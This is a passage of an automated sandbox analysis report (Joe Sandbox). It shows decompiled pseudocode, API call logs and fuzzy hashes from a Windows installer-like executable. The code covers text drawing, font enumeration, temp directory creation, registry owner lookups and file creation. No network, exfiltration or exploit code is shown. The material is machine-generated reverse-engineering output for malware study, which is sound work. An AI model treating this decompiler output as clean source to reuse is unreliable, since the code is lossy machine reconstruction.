							memcpy(_v8, _v24, 0xd << 2);
							_v9 = 1;
						}
					}
					_pop(_t69);
					 *[fs:eax] = _t69;
					_push(E004512FD);
					return E00402668(_v20);
				}
			}

0x004511e9
0x004511eb
0x004511f1
0x004511f4
0x004511f6
0x004511fd
0x00451200
0x00451205
0x00451207
0x00451208
0x0045120d
0x00451211
0x0045128a
0x00451291
0x004512fd
0x00451306
0x00451293
0x0045129a
0x0045129d
0x004512a1
0x00000000
0x004512a3
0x004512a5
0x004512a6
0x004512ab
0x004512ae
0x004512b4
0x004512b8
0x004512b9
0x004512be
0x004512c1
0x004512c2
0x004512c7
0x004512c9
0x004512da
0x004512dc
0x004512dc
0x004512e0
0x004512e2
0x004512e5
0x004512e8
0x004512f5
0x004512f5
0x004512a1
0x00451213
0x0045121a
0x0045121f
0x00451220
0x00451225
0x00451228
0x0045122e
0x0045122f
0x00451230
0x00451233
0x00451234
0x00451235
0x0045123c
0x00451241
0x00451245
0x00451246
0x0045124b
0x0045124e
0x0045124f
0x00451256
0x00451267
0x00451269
0x00451269
0x00451256
0x0045126f
0x00451272
0x00451275
0x00451282
0x00451282

APIs

73EE14E0.VERSION(00000000,?,?,?,0048A045), ref: 00451208
73EE14C0.VERSION(00000000,?,00000000,?,00000000,00451283,?,00000000,?,?,?,0048A045), ref: 00451235
73EE1500.VERSION(?,00451308,?,?,00000000,?,00000000,?,00000000,00451283,?,00000000,?,?,?,0048A045), ref: 0045124F
73EE1500.VERSION(00000000,00451308,?,?,00000000,004512F6,?,00000000,?,?,?,0048A045), ref: 004512C2

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: E1500
String ID:
API String ID: 3315179204-0
Opcode ID: f7e4e4ed3569b35cf546f216edbd6151e9e7466a9b97aa4cce73bd1d26bc1a8f
Instruction ID: 2b2576b2faa4cae369ab06eec08a2510d44d6eb7512a2294fec8a1cdf2a6db1e
Opcode Fuzzy Hash: f7e4e4ed3569b35cf546f216edbd6151e9e7466a9b97aa4cce73bd1d26bc1a8f
Instruction Fuzzy Hash: 85319035A04208AFDB01DAA9CC41BBFB7E8EB49740F5144B6FC00E3691DA799D04C769

Uniqueness

Uniqueness Score: -1.00%

Function 0044B1F8 Relevance: 6.1, APIs: 4, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0044B1F8(struct HDC__* __eax, void* __ebx, void* __edi, void* __esi) {
				struct HDC__* _v8;
				void* _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct HDC__* _t49;
				signed int _t57;
				int _t61;
				struct HDC__* _t67;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t83;
				void* _t84;
				intOrPtr _t85;
				intOrPtr _t89;

				_t81 = __esi;
				_t80 = __edi;
				_t68 = __ebx;
				_t83 = _t84;
				_t85 = _t84 + 0xffffffe4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = 0;
				_v8 = __eax;
				_push(_t83);
				_push(0x44b33b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t85;
				if(( *(_v8 + 0x1c) & 0x00000002) != 0 ||  *((char*)(_v8 + 0xfc)) == 0) {
					__eflags = 0;
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(E0044B342);
					return E00403548( &_v12);
				} else {
					_t71 =  *((intOrPtr*)(_v8 + 0x2c));
					E0040AE50(0,  *((intOrPtr*)(_v8 + 0x2c)), 0,  &_v32, 0);
					if(_v32.right > 0) {
						_t13 =  &(_v32.right);
						 *_t13 = _v32.right - 1;
						_t89 =  *_t13;
					}
					E00414D00(_v8,  &_v12, _t89);
					if(_v12 == 0) {
						L8:
						_t49 = E004036C4( &_v12, 0x44b354);
					} else {
						_t49 = _v8;
						if( *((char*)(_t49 + 0x104)) != 0) {
							_t49 = _v12;
							if( *_t49 == 0x26) {
								_t49 = _v12;
								if(_t49->i == 0) {
									goto L8;
								}
							}
						}
					}
					_push(0);
					L00406034();
					_v16 = _t49;
					_push(_t83);
					_push(0x44b300);
					_push( *[fs:eax]);
					 *[fs:eax] = _t85;
					SelectObject(_v16, E0041A400( *((intOrPtr*)(_v8 + 0x44)), _t68, _t71, _t80, _t81));
					_t57 = E0044B1D4(_v8);
					_t61 = E004036BC(_v12);
					DrawTextA(_v16, E00403880(_v12), _t61,  &_v32, _t57 | 0x00000400); // executed
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(E0044B307);
					_t67 = _v16;
					_push(_t67);
					_push(0);
					L0040621C();
					return _t67;
				}
			}

0x0044b1f8
0x0044b1f8
0x0044b1f8
0x0044b1f9
0x0044b1fb
0x0044b1fe
0x0044b1ff
0x0044b200
0x0044b203
0x0044b206
0x0044b20b
0x0044b20c
0x0044b211
0x0044b214
0x0044b21e
0x0044b325
0x0044b327
0x0044b32a
0x0044b32d
0x0044b33a
0x0044b234
0x0044b23d
0x0044b244
0x0044b24d
0x0044b24f
0x0044b24f
0x0044b24f
0x0044b24f
0x0044b258
0x0044b261
0x0044b280
0x0044b288
0x0044b263
0x0044b263
0x0044b26d
0x0044b26f
0x0044b275
0x0044b277
0x0044b27e
0x00000000
0x00000000
0x0044b27e
0x0044b275
0x0044b26d
0x0044b28d
0x0044b28f
0x0044b294
0x0044b299
0x0044b29a
0x0044b29f
0x0044b2a2
0x0044b2b5
0x0044b2bd
0x0044b2cf
0x0044b2e2
0x0044b2e9
0x0044b2ec
0x0044b2ef
0x0044b2f4
0x0044b2f7
0x0044b2f8
0x0044b2fa
0x0044b2ff
0x0044b2ff

APIs

740BAC50.USER32(00000000,?,00000000,00000000,0044B33B,?,?,?,?), ref: 0044B28F
SelectObject.GDI32(?,00000000), ref: 0044B2B5
DrawTextA.USER32(?,00000000,00000000,?,00000000), ref: 0044B2E2
740BB380.USER32(00000000,?,0044B307,0044B300,?,00000000,?,00000000,00000000,0044B33B,?,?,?,?), ref: 0044B2FA

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B380DrawObjectSelectText
String ID:
API String ID: 1652335368-0
Opcode ID: ab575cbd0e50acc1dc34e348634044fcc5ef1fbbd83519599d04753732d9ac63
Instruction ID: df07f0af1432bdc337ff5497d715d1ed35d162d271ac499453df1447799ef9a4
Opcode Fuzzy Hash: ab575cbd0e50acc1dc34e348634044fcc5ef1fbbd83519599d04753732d9ac63
Instruction Fuzzy Hash: A4316070A04208BFEB11DFA6C845F9EBBF8EB44304F5180AAF404E7291D7789E44CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00416D5A Relevance: 6.1, APIs: 4, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416D5A(void* __eax, int* __edx) {
				void* _t21;
				long _t23;
				long _t37;
				long _t42;
				int _t47;
				struct HWND__* _t50;

				_t49 = __edx;
				_t43 = __eax;
				_t50 =  *(__eax + 0xc0);
				if(_t50 == 0) {
					return E00415534(__eax, __edx);
				}
				_t47 =  *__edx;
				_t21 = _t47 + 0xfffffece - 7;
				if(_t21 < 0) {
					_t23 = SendMessageA(__edx[2], _t47 + 0xbc00, __edx[1], __edx[2]);
					 *(_t49 + 0xc) = _t23;
					return _t23;
				}
				if(_t21 + 0xffff4407 - 7 < 0) {
					SetTextColor(__edx[1], E0041A270( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x44)) + 0x10))));
					SetBkColor(__edx[1], E0041A270(E0041A8BC( *((intOrPtr*)(_t43 + 0xbc)))));
					_t37 = E0041A8F8( *((intOrPtr*)(_t43 + 0xbc)));
					 *(_t49 + 0xc) = _t37;
					return _t37;
				}
				_t42 = CallWindowProcA( *(__eax + 0xac), _t50,  *__edx, __edx[1], __edx[2]); // executed
				 *(_t49 + 0xc) = _t42;
				return _t42;
			}

0x00416d60
0x00416d62
0x00416d64
0x00416d6c
0x00000000
0x00416e06
0x00416d72
0x00416d7b
0x00416d7e
0x00416d9c
0x00416da1
0x00000000
0x00416da1
0x00416d88
0x00416db6
0x00416dd0
0x00416ddb
0x00416de0
0x00000000
0x00416de0
0x00416df8
0x00416dfd
0x00000000

APIs

SendMessageA.USER32 ref: 00416D9C
SetTextColor.GDI32(?,00000000), ref: 00416DB6
SetBkColor.GDI32(?,00000000), ref: 00416DD0
CallWindowProcA.USER32 ref: 00416DF8

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Color$CallMessageProcSendTextWindow
String ID:
API String ID: 601730667-0
Opcode ID: 7503b358d66fc3a9d7431498a67e4aee34d2d99b09742813b6501ed030dd5430
Instruction ID: 45a38edd37f162b3f2d0a33830e07a664c8ab49b18c728b1ae7f4034335bfd62
Opcode Fuzzy Hash: 7503b358d66fc3a9d7431498a67e4aee34d2d99b09742813b6501ed030dd5430
Instruction Fuzzy Hash: 7F114CB6300700AFCB10EFAECC84E9773DCAF48310715846AB59ADB602C639E8418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004232E0 Relevance: 6.1, APIs: 4, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E004232E0(char __edx) {
				char _v5;
				void* __ecx;
				void* __ebp;
				void* _t8;
				struct HDC__* _t18;
				int _t20;
				void* _t22;
				void* _t23;
				char _t24;
				struct HDC__* _t29;
				void* _t30;
				void* _t31;

				_t24 = __edx;
				if(__edx != 0) {
					_t31 = _t31 + 0xfffffff0;
					_t8 = E00402E78(_t8, _t30);
				}
				_v5 = _t24;
				_t22 = _t8;
				E00410438(_t23, 0);
				E00423454(_t22);
				 *(_t22 + 0x20) = E00402C78(1);
				 *((intOrPtr*)(_t22 + 0x2c)) = E00402C78(1);
				_t18 = E00402C78(1);
				 *(_t22 + 0x30) = _t18;
				_push(0);
				L00406034();
				_t29 = _t18;
				_t5 = _t22 + 0x20; // 0x410868
				_t20 = EnumFontsA(_t29, 0, E00423280,  *_t5); // executed
				_push(0x5a);
				_push(_t29);
				L00405D64();
				 *(_t22 + 0x24) = _t20;
				_push(_t29);
				_push(0);
				L0040621C();
				if(_v5 != 0) {
					_pop( *[fs:0x0]);
				}
				return _t22;
			}

0x004232e0
0x004232e8
0x004232ea
0x004232ed
0x004232ed
0x004232f2
0x004232f5
0x004232fb
0x00423302
0x00423313
0x00423322
0x0042332c
0x00423331
0x00423334
0x00423336
0x0042333b
0x0042333d
0x00423349
0x0042334e
0x00423350
0x00423351
0x00423356
0x00423359
0x0042335a
0x0042335c
0x00423365
0x00423367
0x0042336e
0x00423377

APIs

740BAC50.USER32(00000000,?,?,00000000,?,004191EB,00000000,?,?,00000001,00000000), ref: 00423336
EnumFontsA.GDI32(00000000,00000000,00423280,00410868,00000000,?,?,00000000,?,004191EB,00000000,?,?,00000001,00000000), ref: 00423349
740BAD70.GDI32(00000000,0000005A,00000000,00000000,00423280,00410868,00000000,?,?,00000000,?,004191EB,00000000,?,?,00000001), ref: 00423351
740BB380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423280,00410868,00000000,?,?,00000000,?,004191EB,00000000), ref: 0042335C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B380EnumFonts
String ID:
API String ID: 1693878748-0
Opcode ID: dd5a0a61b9c57789cb21afe4cc97496b97b1cfed65055e739ba2d9004f0a2faf
Instruction ID: 30cdd78c7271a8b91fd37f93f07e18dd12414bc1d841c9146bcb6e7370bb8129
Opcode Fuzzy Hash: dd5a0a61b9c57789cb21afe4cc97496b97b1cfed65055e739ba2d9004f0a2faf
Instruction Fuzzy Hash: BD01C0A17443106AE700BF7A5C86B9E3A549F16348F44427BF908BE2C2D67E88058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 0048B274 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 74%

			_entry_(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t8;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				intOrPtr _t44;
				intOrPtr _t50;
				intOrPtr _t57;
				void* _t60;
				void* _t61;
				void* _t63;
				void* _t71;
				intOrPtr _t72;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t82;

				_t83 = __eflags;
				_t71 = __edx;
				_t61 = __ecx;
				E0040348C();
				E004057F0(_t60, _t79, _t80, __eflags); // executed
				_t8 = E00409B70(_t60, _t61, _t71, _t79, _t80, _t83); // executed
				E00409D90(_t8);
				E00410B6C();
				E00410BE4();
				E00412B40(_t60, _t79, _t80, _t83);
				E00425158(E00419258(_t79));
				E0042ECFC();
				E0042FFE0(_t61);
				E00432294(_t61, _t79);
				E0044AB50();
				E0044F528();
				E00450FF8(_t60, _t79, _t80);
				E00451A10();
				E00454E30(_t79, _t80, _t83);
				E00455AA0();
				E00466010(); // executed
				E00478210(_t60, _t79, _t80, _t83); // executed
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				SetErrorMode(1); // executed
				E0048B084();
				_t30 =  *0x48d628; // 0x21d2410
				E004246EC(_t30, _t79, _t80, E0048B074, 0x48b068); // executed
				E0048B0CC(_t60, _t71, _t79, _t80, _t83); // executed
				_pop(_t72);
				_t63 = 0x48b31f;
				 *[fs:eax] = _t72;
				_t34 =  *0x48d628; // 0x21d2410
				E004244DC(_t34, 0x48b484, _t79);
				_t36 =  *0x48d628; // 0x21d2410
				ShowWindow( *(_t36 + 0x20), 5);
				_t39 =  *0x48d628; // 0x21d2410
				 *((intOrPtr*)(_t39 + 0x90)) = 0x46eaac;
				 *((intOrPtr*)(_t39 + 0x8c)) = E00476CE0;
				_push(_t81);
				_push(0x48b3b6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				E004247C0(); // executed
				E0047492C(_t60, _t63, 0x46eaac, _t79, _t80, _t83); // executed
				_t44 =  *0x48d628; // 0x21d2410, executed
				E004247D0(_t44, 0x4adf90, 0x46eaac); // executed
				E00476E54(_t83, __fp0); // executed
				_pop(_t76);
				 *[fs:eax] = _t76;
				_push(_t81);
				_push(0x48b41f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				_t50 =  *0x48d628; // 0x21d2410
				E00424860(_t50, _t79, _t80);
				_pop(_t77);
				 *[fs:eax] = _t77;
				_push(_t81);
				_push(0x48b455);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				E004760BC(0 |  *0x4ae290 == 0x00000000, _t60, _t79, _t80,  *0x4ae290, __fp0);
				_pop(_t78);
				 *[fs:eax] = _t78;
				_t57 =  *0x4ae290; // 0x0
				E00404FA8(_t57);
				return E00404FA4();
			}

0x0048b274
0x0048b274
0x0048b274
0x0048b27d
0x0048b282
0x0048b287
0x0048b28c
0x0048b291
0x0048b296
0x0048b29b
0x0048b2a5
0x0048b2aa
0x0048b2af
0x0048b2b4
0x0048b2b9
0x0048b2be
0x0048b2c3
0x0048b2c8
0x0048b2cd
0x0048b2d2
0x0048b2d7
0x0048b2dc
0x0048b2e9
0x0048b2ec
0x0048b2f1
0x0048b2f6
0x0048b306
0x0048b30b
0x0048b310
0x0048b317
0x0048b319
0x0048b31a
0x0048b33d
0x0048b342
0x0048b349
0x0048b352
0x0048b357
0x0048b361
0x0048b367
0x0048b373
0x0048b374
0x0048b379
0x0048b37c
0x0048b384
0x0048b389
0x0048b398
0x0048b39d
0x0048b3a7
0x0048b3ae
0x0048b3b1
0x0048b3ff
0x0048b400
0x0048b405
0x0048b408
0x0048b40b
0x0048b410
0x0048b417
0x0048b41a
0x0048b430
0x0048b431
0x0048b436
0x0048b439
0x0048b446
0x0048b44d
0x0048b450
0x0048b464
0x0048b469
0x0048b479

APIs

Part of subcall function 0040348C: GetModuleHandleA.KERNEL32(00000000,0048B282), ref: 00403493
Part of subcall function 0040348C: GetCommandLineA.KERNEL32(00000000,0048B282), ref: 0040349E

Part of subcall function 00409D90: 6FEBDB20.COMCTL32(0048B291), ref: 00409D90

Part of subcall function 00410B6C: GetCurrentThreadId.KERNEL32 ref: 00410BBA

Part of subcall function 00419258: GetVersion.KERNEL32(0048B2A5), ref: 00419258

Part of subcall function 00432294: OleInitialize.OLE32(00000000), ref: 004322A0

Part of subcall function 0044F528: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,0048B2C3), ref: 0044F563
Part of subcall function 0044F528: 6D2B5550.KERNEL32(00000000,user32.dll,NotifyWinEvent,0048B2C3), ref: 0044F569

Part of subcall function 00451A10: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,0048B2CD), ref: 00451A1A
Part of subcall function 00451A10: 6D2B5550.KERNEL32(00000000,kernel32.dll,Wow64DisableWow64FsRedirection,0048B2CD), ref: 00451A20
Part of subcall function 00451A10: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,0048B2CD), ref: 00451A34
Part of subcall function 00451A10: 6D2B5550.KERNEL32(00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,0048B2CD), ref: 00451A3A

Part of subcall function 00466010: RegisterClipboardFormatA.USER32 ref: 00466015

SetErrorMode.KERNEL32(00000001,00000000,0048B31F), ref: 0048B2F1

Part of subcall function 0048B084: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0048B2FB,00000001,00000000,0048B31F), ref: 0048B08E
Part of subcall function 0048B084: 6D2B5550.KERNEL32(00000000,user32.dll,DisableProcessWindowsGhosting,0048B2FB,00000001,00000000,0048B31F), ref: 0048B094

Part of subcall function 004246EC: SendMessageA.USER32 ref: 0042470B

Part of subcall function 004244DC: SetWindowTextA.USER32(?,00000000), ref: 004244F4

ShowWindow.USER32(?,00000005,00000000,0048B31F), ref: 0048B352

Part of subcall function 00476E54: SetActiveWindow.USER32(?), ref: 00476EEE

Strings

Setup, xrefs: 0048B338

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: HandleModule$B5550$Window$ActiveClipboardCommandCurrentErrorFormatInitializeLineMessageModeRegisterSendShowTextThreadVersion
String ID: Setup
API String ID: 2965587665-3839654196
Opcode ID: 12136161f2d59f04eafa8e1982de29ca4e46e7352d418c89e571cb6b50e38470
Instruction ID: 06f399641de059cea4a47fa898316e6cec9512e2263ea6d94b5d5effe6ef7e30
Opcode Fuzzy Hash: 12136161f2d59f04eafa8e1982de29ca4e46e7352d418c89e571cb6b50e38470
Instruction Fuzzy Hash: 0D31D7316046409ED211BFB7EC1391E3798EB8A728751487FF90496A93DF3D5810DB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00452118 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00452118(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				int _t30;
				intOrPtr _t62;
				void* _t72;
				intOrPtr _t75;

				_t70 = __edi;
				_t53 = __ebx;
				_t54 = 0;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__edi);
				_t72 = __eax;
				_push(_t75);
				_push(0x452207);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75;
				while(1) {
					E0042D990( &_v12, _t53, _t54, _t70, _t72); // executed
					_t54 = 0x452220;
					E00451EA4(0, _t53, 0x452220, _v12, _t70, _t72,  &_v8); // executed
					_t30 = CreateDirectoryA(E00403880(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t53 = GetLastError();
					if(_t38 != 0xb7) {
						E00450C5C(0x2f,  &_v28, _v8);
						_v24 = _v28;
						E00406E04(_t53,  &_v32);
						_v20 = _v32;
						E0042E7A4(_t53,  &_v36);
						_v16 = _v36;
						E00450C2C(0x60, 2,  &_v24,  &_v12);
						_t54 = _v12;
						E00408DF0(_v12, 1);
						E00403264();
					}
				}
				E004035DC(_t72, _v8);
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E0045220E);
				E00403568( &_v36, 3);
				return E00403568( &_v12, 2);
			}

0x00452118
0x00452118
0x0045211b
0x0045211d
0x0045211e
0x0045211f
0x00452120
0x00452121
0x00452122
0x00452123
0x00452124
0x00452125
0x00452127
0x00452128
0x0045212c
0x0045212d
0x00452132
0x00452135
0x00452138
0x0045213f
0x00452147
0x0045214e
0x0045215e
0x00452165
0x00000000
0x00000000
0x0045216c
0x00452174
0x00452182
0x0045218a
0x00452192
0x0045219a
0x004521a2
0x004521aa
0x004521b7
0x004521bc
0x004521c6
0x004521cb
0x004521cb
0x00452174
0x004521da
0x004521e1
0x004521e4
0x004521e7
0x004521f4
0x00452206

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00452207,?,?,00000000,0048D628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045215E
GetLastError.KERNEL32(00000000,00000000,?,00000000,00452207,?,?,00000000,0048D628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452167

Strings

.tmp, xrefs: 00452147

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 02bb0438183800f50e9af03f347ab1e11b67288a0ca01368fb0cf542fd4d500a
Instruction ID: 7bf3b34eb0cf2eb0ff3e70cf5e19dc3833f629eefe8374bafbd98f486a21a8bc
Opcode Fuzzy Hash: 02bb0438183800f50e9af03f347ab1e11b67288a0ca01368fb0cf542fd4d500a
Instruction Fuzzy Hash: 10216774A00208AFDB05EFA5C9829DFB7B9EF44305F10457BF801B7342DA789E058A69

Uniqueness

Uniqueness Score: -1.00%

Function 00471A7C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00471A7C(void* __eflags) {
				void* _v8;
				void* __ecx;
				void* _t11;
				long _t17;

				_t11 = E0042DD88(0,  *0x0048CBB0, 0x80000002,  &_v8, 1, 0); // executed
				if(_t11 == 0) {
					E0042DCB8();
					E0042DCB8();
					_t17 = RegCloseKey(_v8); // executed
					return _t17;
				}
				return _t11;
			}

0x00471a9d
0x00471aa4
0x00471ab3
0x00471ac5
0x00471ace
0x00000000
0x00471ace
0x00471ad5

APIs

Part of subcall function 0042DD88: 6D2B6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00477FD3,?,00000001,?,?,00477FD3,?,00000001,00000000), ref: 0042DDA4

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,00471CF2,00000000,00471D08,?,?,?,?,00000000,?,00489B16), ref: 00471ACE

Strings

RegisteredOrganization, xrefs: 00471ABD
RegisteredOwner, xrefs: 00471AAB

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6790Close
String ID: RegisteredOrganization$RegisteredOwner
API String ID: 2256921126-1113070880
Opcode ID: 00005b6c2ae949f08c83e11263df9079e85e961ae2957e1435eb0d9b2c1e9a8f
Instruction ID: a6f71f8f369b1da023f280aae3ecda9b8cda437b60bc8e781293245c92a1966f
Opcode Fuzzy Hash: 00005b6c2ae949f08c83e11263df9079e85e961ae2957e1435eb0d9b2c1e9a8f
Instruction Fuzzy Hash: E2F03075B04148ABDB00E7A6E953B9F33A9DF42304FA4847AA504EB351DAB9EE00975C

Uniqueness

Uniqueness Score: -1.00%

Function 0046C9FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0046C9FC(void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __ebp;
				void* _t10;
				intOrPtr _t13;
				void* _t16;

				_push(0);
				_push(0x80);
				_push(1);
				_push(0);
				_push(0);
				_push(0xc0000000);
				_t10 = E00403880( *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) - 0x14)));
				_push(_t10); // executed
				L00405964(); // executed
				_t16 = _t10;
				_t21 = _t16 - 0xffffffff;
				if(_t16 == 0xffffffff) {
					E00451B58("CreateFile", _t16, __ecx, __edi, __esi, _t21);
				}
				CloseHandle(_t16);
				_t13 =  *((intOrPtr*)(_a4 + 8));
				 *((char*)(_t13 - 0x19)) = 1;
				return _t13;
			}

0x0046ca00
0x0046ca02
0x0046ca07
0x0046ca09
0x0046ca0b
0x0046ca0d
0x0046ca1b
0x0046ca20
0x0046ca21
0x0046ca26
0x0046ca28
0x0046ca2b
0x0046ca32
0x0046ca32
0x0046ca38
0x0046ca40
0x0046ca43
0x0046ca49

APIs

6D2B5CA0.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0046CB85), ref: 0046CA21
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0046CB85), ref: 0046CA38

Part of subcall function 00451B58: GetLastError.KERNEL32(00000000,00451BF0,?,?,00000000,00000000,00000005,00000000,00452636,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451B7C

Strings

CreateFile, xrefs: 0046CA2D

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
